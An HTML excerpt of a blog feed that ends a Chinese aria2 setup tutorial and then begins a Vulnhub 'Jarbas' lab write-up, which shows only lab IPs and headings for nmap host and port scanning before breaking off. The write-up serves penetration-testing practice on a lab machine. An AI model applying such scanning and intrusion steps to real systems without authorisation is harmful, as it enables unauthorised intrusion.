href="https://then.tw/aria2/#%E5%9F%B7%E8%A1%8C-aria2"><b># </b></a><b>執行 aria2</b></span></span></h3><div class="notion-text notion-block-e3fdf9391e0e4791971aab935e62de91">以上建立的 1 個 vbs 檔、3 個 bat 檔的功能就如同其名稱，現在我們要啟動 aria2，所以請點兩下 <code class="notion-inline-code"><b>Start.vbs</b></code>，讓 aria2 在背景執行。因為是在背景執行，所以</div><blockquote class="notion-quote notion-block-fd91f12cdaf64bf8870ef1d60acd0ecb"><div>不會有任何畫面！ 不會有任何畫面！ 不會有任何畫面！</div></blockquote><div class="notion-text notion-block-c2c15d1cb41248f39bf11e5bf21be4a6">這很重要所以說 3 次。</div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-d8ffbd6069724b7eacf5342b494d37e4" data-id="d8ffbd6069724b7eacf5342b494d37e4"><span><div id="d8ffbd6069724b7eacf5342b494d37e4" class="notion-header-anchor"></div><a class="notion-hash-link" href="#d8ffbd6069724b7eacf5342b494d37e4" title="# 檢查 aria2 狀態"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#%E6%AA%A2%E6%9F%A5-aria2-%E7%8B%80%E6%85%8B"><b># </b></a><b>檢查 aria2 狀態</b></span></span></h4><div class="notion-text notion-block-f15de81aef9f46b48a449b9320ab2369">如果您要確定 aria2 是否真的在執行，可以點兩下 <code class="notion-inline-code"><b>Status.bat</b></code> 查看狀態。應該會看到類似下面這樣的資訊，就表示 aria2 已經在背景運作了。</div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-a74035eb785d41c181d6c9ff27c5dd23" data-id="a74035eb785d41c181d6c9ff27c5dd23"><span><div id="a74035eb785d41c181d6c9ff27c5dd23" class="notion-header-anchor"></div><a class="notion-hash-link" href="#a74035eb785d41c181d6c9ff27c5dd23" title="# 除錯"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#%E9%99%A4%E9%8C%AF"><b># </b></a><b>除錯</b></span></span></h4><div class="notion-text notion-block-b1e8a1dce2bd4b68b4436759197a832a">如果您在改完設定檔 <code class="notion-inline-code"><b>aria2.conf</b></code> 後遇到任何問題，或 <code class="notion-inline-code"><b>Status.bat</b></code> 也說沒有 aria2 在背景執行，說明設定檔有錯誤。如果您熟悉使用命令提示字元 / PowerShell / Windows Terminal 的操作，可以直接下指令：</div><div class="notion-text notion-block-63f8b2743d6e47c3a623fb1aa1c52f6b">來檢查是哪邊報錯。如果您不熟悉這些操作，請用「修改一次、執行一次」的方式除錯。即每改完一次 <code class="notion-inline-code"><b>aria2.conf</b></code>，就用 <code class="notion-inline-code"><b>Restart.bat</b></code> 重啟，並用 <code class="notion-inline-code"><b>Status.bat</b></code> 檢查到底有沒有正確執行。</div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-ed53f1419ae341be84d619b4194abc4e" data-id="ed53f1419ae341be84d619b4194abc4e"><span><div id="ed53f1419ae341be84d619b4194abc4e" class="notion-header-anchor"></div><a class="notion-hash-link" href="#ed53f1419ae341be84d619b4194abc4e" title="# 重啟或關閉 aria2"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#%E9%87%8D%E5%95%9F%E6%88%96%E9%97%9C%E9%96%89-aria2"><b># </b></a><b>重啟或關閉 aria2</b></span></span></h4><div class="notion-text notion-block-90be7ff48a1346fc8b1972ccc19b7bb4">點兩下 <code class="notion-inline-code"><b>Restart.bat</b></code> 即會重啟 aria2，您會看到一個黑畫面一閃而過，這是正常的，黑畫面消失後就代表 aria2 已經成功重啟了。</div><div class="notion-text notion-block-49295cbb3bb3457dafd3bc5ae1cdf1df">若要關閉 aria2，點兩下 <code class="notion-inline-code"><b>Stop.bat</b></code> 後看到類似以下訊息就是成功關閉囉！</div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-e3750fe6eb9448a3a06203a4723b38c1" data-id="e3750fe6eb9448a3a06203a4723b38c1"><span><div id="e3750fe6eb9448a3a06203a4723b38c1" class="notion-header-anchor"></div><a class="notion-hash-link" href="#e3750fe6eb9448a3a06203a4723b38c1" title="# aria2 控制台"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#aria2-%E6%8E%A7%E5%88%B6%E5%8F%B0"><b># </b></a><b>aria2 控制台</b></span></span></h3><div class="notion-text notion-block-0963e8e770cd4a3498c32f8e5acf47fb">筆者喜歡的控制台為 mayswind 所編寫的 AriaNg，如果有需要自行架設控制台的朋友，可以前往 AriaNg 的<a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://github.com/mayswind/AriaNg/releases">專案頁面</a>下載。</div><ul class="notion-list notion-list-disc notion-block-dc96136b99394e08b9ae2a9dd935d292"><li><s>前往 </s><a target="_blank" rel="noopener noreferrer" class="notion-link" href="http://ariang.mayswind.net/latest"><s>aria2 控制台</s></a> <b>※ 2022 更新，因 Chome/Edge 新版會有 CORS 問題</b>，而無法連線。開啟 F12 會顯示 Access to XMLHttpRequest at <a target="_blank" rel="noopener noreferrer" class="notion-link" href="http://localhost:6800/jsonrpc">http://localhost:6800/jsonrpc</a> from origin <a target="_blank" rel="noopener noreferrer" class="notion-link" href="http://ariang.mayswind.net/">http://ariang.mayswind.net</a> has been blocked by CORS policy.</li></ul><blockquote class="notion-quote notion-block-7321ed0be685490583eff317d83e1446"><div>※【步驟更新】請下載 Releases 頁面中，Assets 下之 AriaNg-版本-AllInOne.zip 來使用。解壓縮後點兩下開啟 index.html 即可。https://github.com/mayswind/AriaNg/releases</div></blockquote><div class="notion-text notion-block-bada82d4374646a9a6ef9773ee1b5e08">請點選「AriaNg 設定」 →「RPC」→ 在 Aria2 RPC 位址中填入「<code class="notion-inline-code">localhost</code>」即可。</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-abf527fe3fe848e29771a93f9376bff7"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F3f0e38d2-2f01-40c9-be84-08807b9928f8%2FUntitled.png?table=block&amp;id=abf527fe-3fe8-48e2-9771-a93f9376bff7&amp;t=abf527fe-3fe8-48e2-9771-a93f9376bff7&amp;width=1920&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-4b64f74411144642b08b14863ef90de0">再來就可以盡情享受快速下載囉！</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-cba6f1369b574f04a1f07edd5de6deed"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F37cc1a66-c19f-4d34-b3ca-12017898be28%2FUntitled.png?table=block&amp;id=cba6f136-9b57-4f04-a1f0-7edd5de6deed&amp;t=cba6f136-9b57-4f04-a1f0-7edd5de6deed&amp;width=1920&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-bbe55286e2854aac8b89396219c99233">可以看到 aria2 一次以 10 個連線數下載檔案，有助於提升下載速度！</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-94f8922283154acf8dad49b5ec04b001"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F6bf7a57c-e1df-441c-9603-6a43993cb092%2FUntitled.png?table=block&amp;id=94f89222-8315-4acf-8dad-49b5ec04b001&amp;t=94f89222-8315-4acf-8dad-49b5ec04b001&amp;width=1920&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-66f985189ca74d2797ad675b0471b58c">下載完的檔案位置位在 aria2 目錄的 <code class="notion-inline-code"><b>Download</b></code> 資料夾，假設程式路徑是 <code class="notion-inline-code"><b>C:\aria2</b></code>，那下載資料夾就是 <code class="notion-inline-code"><b>C:\aria2\Download</b></code>。如需修改下載資料夾，請參照上面的 <code class="notion-inline-code"><b>aria2.conf</b></code> 中的第 7 行 (<code class="notion-inline-code"><b>dir=Download</b></code>)，資料夾名稱請不要使用中文或特殊符號，以免發生錯誤。</div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-ddf4d046ca7a46b4a612063026a5a4f6" data-id="ddf4d046ca7a46b4a612063026a5a4f6"><span><div id="ddf4d046ca7a46b4a612063026a5a4f6" class="notion-header-anchor"></div><a class="notion-hash-link" href="#ddf4d046ca7a46b4a612063026a5a4f6" title="# Docker 版"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#docker-%E7%89%88"><b># </b></a><b>Docker 版</b></span></span></h3><div class="notion-text notion-block-dd79a417da2749518ae8d53a4699c2e2">推薦使用 P3TERX 的 <a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://github.com/P3TERX/Aria2-Pro-Docker">Aria2-Pro</a>。筆者就架了一個 Aria2-Pro 在自己的伺服器上，若需要長時間下載的檔案就丟上去慢慢抓，十分方便。但請您<b>盡量不要開放外部存取</b>！如有相關需求也務必注意安全性，最好限制僅能<b>特定 IP 能連</b>、可用<b>反向代理</b>、且<b>金鑰一定要夠複雜</b>。</div><div class="notion-text notion-block-fb7b0f8cd33e45e6be7f1a2a9567b045">以下設定中 aria2 在 6800 port，AriaNg 則在 6880 port。</div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-a4f59ab364ca4f4988edf0a1c6060e7a" data-id="a4f59ab364ca4f4988edf0a1c6060e7a"><span><div id="a4f59ab364ca4f4988edf0a1c6060e7a" class="notion-header-anchor"></div><a class="notion-hash-link" href="#a4f59ab364ca4f4988edf0a1c6060e7a" title="# docker-compose.yml"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#docker-composeyml"><b># </b></a><b>docker-compose.yml</b></span></span></h4><div class="notion-text notion-block-310789762cee45419104e64560edd626">本文由大佬<code class="notion-inline-code"> </code><code class="notion-inline-code"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/about/">Chiahong</a></code><code class="notion-inline-code"> </code>分享，如需引用時請註明來源，感謝您！</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-ea8c4b9162ee4a1c95203567a3cef5cb" data-id="ea8c4b9162ee4a1c95203567a3cef5cb"><span><div id="ea8c4b9162ee4a1c95203567a3cef5cb" class="notion-header-anchor"></div><a class="notion-hash-link" href="#ea8c4b9162ee4a1c95203567a3cef5cb" title="🤗 总结归纳"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">🤗 总结归纳</span></span></h2><div class="notion-text notion-block-3d9a31ac7e664ecfa12add873932695d">以下是我根据文章整理后的工具，欢迎自取</div><div class="notion-text notion-block-51b1a97bf82d4ef78d40bddad5caea87">使用方法：Start.vbs→Status.bat(确认进程)→AriaNG文件夹里面的.html文件</div><div class="notion-file notion-block-2fab68f2cbbd46f8b0de517a98779c7c"><a target="_blank" rel="noopener noreferrer" class="notion-file-link" href="https://file.notion.so/f/f/27e0ef76-643c-4c73-8160-d75849541dbf/7bb41d5e-4964-43ae-8069-3b241f828e4a/%E6%95%B4%E5%90%88.zip?id=2fab68f2-cbbd-46f8-b0de-517a98779c7c&amp;table=block&amp;spaceId=27e0ef76-643c-4c73-8160-d75849541dbf&amp;expirationTimestamp=1718402400000&amp;signature=aGZiLrIdBkXFDECUZvBIjTab5H-__ps2oH5ETeC7TZ4"><svg class="notion-file-icon" viewBox="0 0 30 30"><path d="M22,8v12c0,3.866-3.134,7-7,7s-7-3.134-7-7V8c0-2.762,2.238-5,5-5s5,2.238,5,5v12c0,1.657-1.343,3-3,3s-3-1.343-3-3V8h-2v12c0,2.762,2.238,5,5,5s5-2.238,5-5V8c0-3.866-3.134-7-7-7S6,4.134,6,8v12c0,4.971,4.029,9,9,9s9-4.029,9-9V8H22z"></path></svg><div class="notion-file-info"><div class="notion-file-title">整合.zip</div><div class="notion-file-size">2948.7KB</div></div></a></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-4c1f16af0a7346f09aee9fb4dd0413af" data-id="4c1f16af0a7346f09aee9fb4dd0413af"><span><div id="4c1f16af0a7346f09aee9fb4dd0413af" class="notion-header-anchor"></div><a class="notion-hash-link" href="#4c1f16af0a7346f09aee9fb4dd0413af" title="📎 参考文章"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">📎 参考文章</span></span></h2><ul class="notion-list notion-list-disc notion-block-26be40e5a773452bbe6e18d0bc69292d"><li><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/">aria2 設定教學 – 強大又輕巧的下載工具，支援 BT、斷點續傳 | Then Notes 隨筆</a></li></ul><ul class="notion-list notion-list-disc notion-block-71f530968f0a4552aae27d6166ec5eef"></ul><div class="notion-blank notion-block-68274605366a41bcb7243346dec4a057"> </div><div class="notion-callout notion-gray_background_co notion-block-cf0c556838fd4720ae906251d4813afb"><div class="notion-page-icon-inline notion-page-icon-span"><span class="notion-page-icon" role="img" aria-label="💡">💡</span></div><div class="notion-callout-text">欢迎您在底部评论区留言，一起交流~</div></div></main></div>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[jarbas—vulnhub]]></title>
            <link>https://yuki8888.top/article/3f9b51f1-7e57-4f4d-9f7d-c645bf3a06a4</link>
            <guid>https://yuki8888.top/article/3f9b51f1-7e57-4f4d-9f7d-c645bf3a06a4</guid>
            <pubDate>Wed, 28 Jun 2023 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<div id="notion-article" class="mx-auto overflow-hidden "><main class="notion light-mode notion-page notion-block-3f9b51f17e574f4d9f7dc645bf3a06a4"><div class="notion-viewport"></div><div class="notion-collection-page-properties"></div><div class="notion-callout notion-gray_background_co notion-block-7f690ba7e3a341d28b7336976f4ac2a8"><div class="notion-page-icon-inline notion-page-icon-span"><span class="notion-page-icon" role="img" aria-label="😀">😀</span></div><div class="notion-callout-text">这里写文章的前言：
一个简单的开头,简述这篇文章讨论的问题、目标、人物、背景是什么？并简述你给出的答案。<div class="notion-text notion-block-d81dcb64504d4de7a3755c8eb81bbcf5">可以说说你的故事：阻碍、努力、结果成果，意外与转折。</div></div></div><div class="notion-blank notion-block-03b1bf37d8d3460ca5839ffb7ade35c6"> </div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-7841249eed184de2b336a2abf9954abc" data-id="7841249eed184de2b336a2abf9954abc"><span><div id="7841249eed184de2b336a2abf9954abc" class="notion-header-anchor"></div><a class="notion-hash-link" href="#7841249eed184de2b336a2abf9954abc" title="📝 主旨内容"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">📝 主旨内容</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-7693b371342d441cb44e5d7f5c187570" data-id="7693b371342d441cb44e5d7f5c187570"><span><div id="7693b371342d441cb44e5d7f5c187570" class="notion-header-anchor"></div><a class="notion-hash-link" href="#7693b371342d441cb44e5d7f5c187570" title="jarbas靶机"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">jarbas靶机</span></span></h2><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-8f603dcec321421da882325cea089421" data-id="8f603dcec321421da882325cea089421"><span><div id="8f603dcec321421da882325cea089421" class="notion-header-anchor"></div><a class="notion-hash-link" href="#8f603dcec321421da882325cea089421" title="发现主机"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">发现主机</span></span></h3><div class="notion-text notion-block-2e4c2baeea96477797adea47f383176e">靶机：192.168.235.134</div><div class="notion-text notion-block-a34e8de8a6774d11a7fa613d5b37aee7">kali：192.168.235.125</div><div class="notion-text notion-block-dd0b2751cd7841f6842d8191750490f8">重装了一遍环境，内网IP后面有变动</div><div class="notion-blank notion-block-c7e7e01b60ff4713b9de27e8f5f64671"> </div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-132019046393479290bec6848fe35886" data-id="132019046393479290bec6848fe35886"><span><div id="132019046393479290bec6848fe35886" class="notion-header-anchor"></div><a class="notion-hash-link" href="#132019046393479290bec6848fe35886" title="扫描端口"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">扫描端口</span></span></h3><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-eb395159b80047aeb4f8e741bd7df139" data-id="eb395159b80047aeb4f8e741bd7df139"><span><div id="eb395159b80047aeb4f8e741bd7df139" class="notion-header-anchor"></div><a class="notion-hash-link" href="#eb395159b80047aeb4f8e741bd7df139" title="nmap自动脚本扫描工具①"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">nmap自动脚本扫描工具①</span></span></h4><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-6435027b7fb74a8d89405539d23d4bc1" data-id="6435027b7fb74a8d89405539d23d4bc1"><span><div id="6435027b7fb74a8d89405539d23d4bc1" class="notion-header-anchor"></div><a class="notion-hash-link" href="#6435027b7fb74a8d89405539d23d4bc1" title="nmap端口扫描②"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">nmap端口扫描②</span></span></h4><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-b24ad76f95984195badfb814bdb502c3" data-id="b24ad76f95984195badfb814bdb502c3"><span><div id="b24ad76f95984195badfb814bdb502c3" class="notion-header-anchor"></div><a class="notion-hash-link" href="#b24ad76f95984195badfb814bdb502c3" title="扫主机开放端口"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">扫主机开放端口</span></span></h3><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-59ea3585c366486baa3029c285e4ddbd" data-id="59ea3585c366486baa3029c285e4ddbd"><span><div id="59ea3585c366486baa3029c285e4ddbd" class="notion-header-anchor"></div><a class="notion-hash-link" href="#59ea3585c366486baa3029c285e4ddbd" title="扫描tcp"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">扫描tcp</span></span></h4><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-cbf3dfc2e789483fa2e2ac8036a0abca" data-id="cbf3dfc2e789483fa2e2ac8036a0abca"><span><div id="cbf3dfc2e789483fa2e2ac8036a0abca" class="notion-header-anchor"></div><a class="notion-hash-link" href="#cbf3dfc2e789483fa2e2ac8036a0abca" title="扫描udp"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">扫描udp</span></span></h4><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-765903be52ba423fa5bee2a8ca375589" data-id="765903be52ba423fa5bee2a8ca375589"><span><div 